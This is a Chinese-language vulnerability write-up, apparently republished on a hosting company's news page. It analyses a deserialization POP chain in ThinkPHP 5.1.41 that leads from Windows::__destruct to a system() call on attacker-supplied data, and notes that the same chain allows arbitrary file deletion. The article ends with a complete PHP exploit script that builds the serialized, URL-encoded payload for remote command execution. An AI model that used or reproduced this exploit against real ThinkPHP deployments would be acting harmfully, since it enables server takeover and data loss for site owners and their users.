溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Thinkphp v5.1.41反序列化漏洞的分析及EXP

發(fā)布時(shí)間:2021-10-18 16:05:12 來源:億速云 閱讀:3710 作者:柒染 欄目:安全技術(shù)

Thinkphp v5.1.41反序列化漏洞的分析及EXP,很多新手對(duì)此不是很清楚,為了幫助大家解決這個(gè)難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來學(xué)習(xí)下,希望你能有所收獲。

TP5141 反序列化

# Author: 4ut15m
# Date: 2021年4月11日 22:45:46
# Version: thinkphp v5.1.41LTS
# Install: composer create-project topthink/think tp5141 5.1.41 --prefer-dist

晚上回顧tp以前反序列化漏洞的時(shí)候發(fā)現(xiàn)的,好像是一條新的POP鏈,沒有在網(wǎng)上看見其他師傅發(fā)表這條鏈

POP鏈

Windows->__destruct	-->Windows->removeFiles		-->Conversion->__toString		-->Conversion->toJson		-->Conversion->toArray		-->Attribute->getAttr


Conversion->Model
Model->Pivot

先看命令執(zhí)行處,若$closure$value都可控,即可執(zhí)行命令

Thinkphp v5.1.41反序列化漏洞的分析及EXP

POP鏈?zhǔn)缀蛅p5.0反序列化漏洞起點(diǎn)一樣,Windows->__destruct

Thinkphp v5.1.41反序列化漏洞的分析及EXP

Windows->removeFiles,控制Windows->files可以刪除任意文件。

Thinkphp v5.1.41反序列化漏洞的分析及EXP

file_exists函數(shù)可觸發(fā)__toString魔術(shù)方法,找到Conversion的toString

Thinkphp v5.1.41反序列化漏洞的分析及EXP

Thinkphp v5.1.41反序列化漏洞的分析及EXP

跟進(jìn)Conversion->toArray,$this->append可控

Thinkphp v5.1.41反序列化漏洞的分析及EXP

跟進(jìn)getRelation,使得該方法返回null即可進(jìn)入if

Thinkphp v5.1.41反序列化漏洞的分析及EXP

跟進(jìn)getAttr,發(fā)現(xiàn)關(guān)鍵點(diǎn)

Thinkphp v5.1.41反序列化漏洞的分析及EXP

要使代碼執(zhí)行到493行,需要設(shè)置$this->withAttr[$fileName].$closure$this->withAttr[$fileName]控制,$this->withAttr可控,$fileName由我們參數(shù)$name即我們傳入的$this->append的key控制,也是可控的。

value由getData得到

Thinkphp v5.1.41反序列化漏洞的分析及EXP

代碼第269行,如果$this->data中存在$name鍵,就將$this->data[$name]的值賦給value,$this->data與$name皆可控,故value可控

整理思路如下

Conversion->append = ["4ut15m"=>[]]
Conversion->relation = false
Conversion->withAttr = ["4ut15m"=>"system"]
Conversion->data = ["4ut15m"=>"cmd"]			//要執(zhí)行的命令

因?yàn)閏onvertion是trait類,所以只要找到一個(gè)使用了conversion的類即可,全局搜索conversion找到Model類

Thinkphp v5.1.41反序列化漏洞的分析及EXP

由于Model是抽象類,我們得找到Model的實(shí)現(xiàn)類,全局搜索找到Pivot

Thinkphp v5.1.41反序列化漏洞的分析及EXP

至此可以編寫exp

Windows->files = new Pivot()
Pivot->relation = false
Pivot->data = ["4ut15m"=>"cmd"]		//要執(zhí)行的命令
Pivot->withAttr = ["4ut15m"=>"system"]

exp

<?php
namespace think;
abstract class Model{
    private $data = [];
    private $withAttr = [];
    protected $append = ['4ut15m'=>[]];

    public function __construct($cmd){
        $this->relation = false;
        $this->data = ['4ut15m'=>$cmd];		//任意值,value
        $this->withAttr = ['4ut15m'=>'system'];
    }
}

namespace think\model;
use think\Model;
class Pivot extends Model{
}


namespace think\process\pipes;
use think\model\Pivot;
class Windows{
    private $files = [];

    public function __construct($cmd){
        $this->files = [new Pivot($cmd)];		//Conversion類
    }

}

$windows = new Windows($argv[1]);
echo urlencode(serialize($windows))."\n";


?>

在tp中加一個(gè)反序列化點(diǎn)

Thinkphp v5.1.41反序列化漏洞的分析及EXP

Thinkphp v5.1.41反序列化漏洞的分析及EXP

Thinkphp v5.1.41反序列化漏洞的分析及EXP

Thinkphp v5.1.41反序列化漏洞的分析及EXP

看完上述內(nèi)容是否對(duì)您有幫助呢?如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝您對(duì)億速云的支持。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI